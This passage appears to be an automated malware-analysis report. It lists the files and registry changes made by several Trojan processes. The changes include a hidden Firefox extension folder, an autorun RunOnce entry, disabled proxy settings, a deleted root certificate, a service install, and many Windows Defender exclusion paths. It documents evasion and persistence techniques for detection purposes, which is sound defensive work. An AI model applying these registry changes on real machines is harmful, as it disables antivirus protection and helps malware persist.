%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ru\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\mk\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fil (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\de\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hr\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\vi (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt_PT\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fa (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ko\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fi (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fr (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\files (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\pt_BR\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\cs\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fil\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\bn\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\no (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\nl (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sk\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin\bindings.css (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\zh_CN\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en_GB\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\files\main.css (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\el (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\es (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\uk (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\es\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\et (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\mr\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\Kernel.js (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\no\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\da\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ms (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\mr (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ms\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\te\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\install.rdf (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\tr (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sl\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\mk (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\th (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\files\background.js (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ml (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\et\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\uk\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ta (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\tr\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\de (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\da (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fi\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\hi\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\it\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ml\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ru (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\th\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ar\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sq (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\fa\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sr (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sw (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sv (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\lt (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\lv (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\sl (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin\bindings.xml (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\am\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ro (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\files\foreground.js (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ca (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\gu\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\icons\icon48.png (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\cs (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\icons\icon19.png (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\zh_CN (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\zh_TW\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\ko (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\kn (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en_US\messages.json (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\skin\background.png (0 bytes)
%Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}jiuuptwdsi\chrome\_locales\en_US (0 bytes)

The process ytab_m_1_big.exe:2980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\GroupPolicy\gpt.ini (268 bytes)
C:\Windows\System32\GroupPolicy\Machine\Registry.pol (2 bytes)

Registry activity

The process brastub6ab_amobl_inst.exe:3884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASAPI32]
"ConsoleTracingMask" = "4294901760"

"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\brastub6ab_amobl_inst_RASAPI32]
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:1796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD]
"Blob" = "0F 00 00 00 01 00 00 00 20 00 00 00 52 29 BA 15"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\cc1257ab71774624b730464a2b2db389_RASMANCS]
"EnableFileTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"%original file name%.exe" = "c:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates]
"D69B561148F01C77C54578C10926DF5B856976AD"

The process setup.4.15.f.exe:2796 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\upm]
"app" = "4B E8 E3 9B FD 1F 55 BF DE BA AF 90 5C B8 C7 EA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8948C1BE-92B8-4276-8803-DC71CC78203A}]
"DisplayIcon" = "%Program Files%\EnjoyWiFi\EnjoyWiFi.exe"
"InstallLocation" = "%Program Files%\EnjoyWiFi"
"UninstallString" = "%Program Files%\EnjoyWiFi\uninst.exe"

[HKLM\SOFTWARE\Microsoft\SystemSettings\Fetcher]
"01" = "E3 72 9B 4B 6C 70 5D 09 F5 23 83 45 5D 8F 8B C8"

[HKLM\System\CurrentControlSet\services\wfcre\Parameters]
"374335773" = "3A C8 3F 6D C1 E8 51 B0 0A D2 ED EF 6F 39 D2 3F"

[HKLM\System\CurrentControlSet\services\wfcre]
"Group" = "PNP_TDI"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8948C1BE-92B8-4276-8803-DC71CC78203A}]
"DisplayName" = "EnjoyWiFi"

[HKLM\System\CurrentControlSet\services\wfcre]
"Start" = "1"

The process adv_334.exe:3644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKCU\Software\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32]
"p2pcollab.dll,-8042" = "Peer to Peer Trust"
"qagentrt.dll,-10" = "System Health Authentication"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32]
"dnsapi.dll,-103" = "Domain Name System (DNS) Server Trust"

[HKLM\SOFTWARE]
"global UID" = "JQL2PBZ4BRSSJ9BVD5CGZSCYGG62XGDE"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32]
"fveui.dll,-844" = "BitLocker Data Recovery Agent"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32]
"fveui.dll,-843" = "BitLocker Drive Encryption"

[HKCU\Software\Classes\Local Settings\MuiCache\2E\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\adv_334_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process adv_334.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Temp]
"tSTyTySFVfUEcTqwC" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"thzXuJvjU" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Temp]
"tSTyTySFVfUEcTqwC" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\LocalLow]
"HGQlVNXRXkVsT" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"dCHHaxjOpqUn" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions]
"cmhomipkklckpomafalojobppmmidlgl" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\LocalLow]
"HGQlVNXRXkVsT" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%\Mozilla Firefox\browser\features]
"{5C3FD6D1-9185-4195-B5E1-FAB622427F59}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp]
"gJSJnJhSyQxKVwHx" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"QYERbvxRHIE" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions]
"cmhomipkklckpomafalojobppmmidlgl" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp]
"gJSJnJhSyQxKVwHx" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"GXZiGyYLSHyU2" = "0"
"QYERbvxRHIE" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"GXZiGyYLSHyU2" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%\Mozilla Firefox\browser\features]
"{5C3FD6D1-9185-4195-B5E1-FAB622427F59}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction]
"225451" = "6"

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"dCHHaxjOpqUn" = "0"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\%Program Files%]
"thzXuJvjU" = "0"

The process sdfCF40.exe:2912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASMANCS]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\sdfCF40_RASAPI32]
"MaxFileSize" = "1048576"

The process Setup.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Setup_RASAPI32]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

The process Setup.exe:4028 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1478708930"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

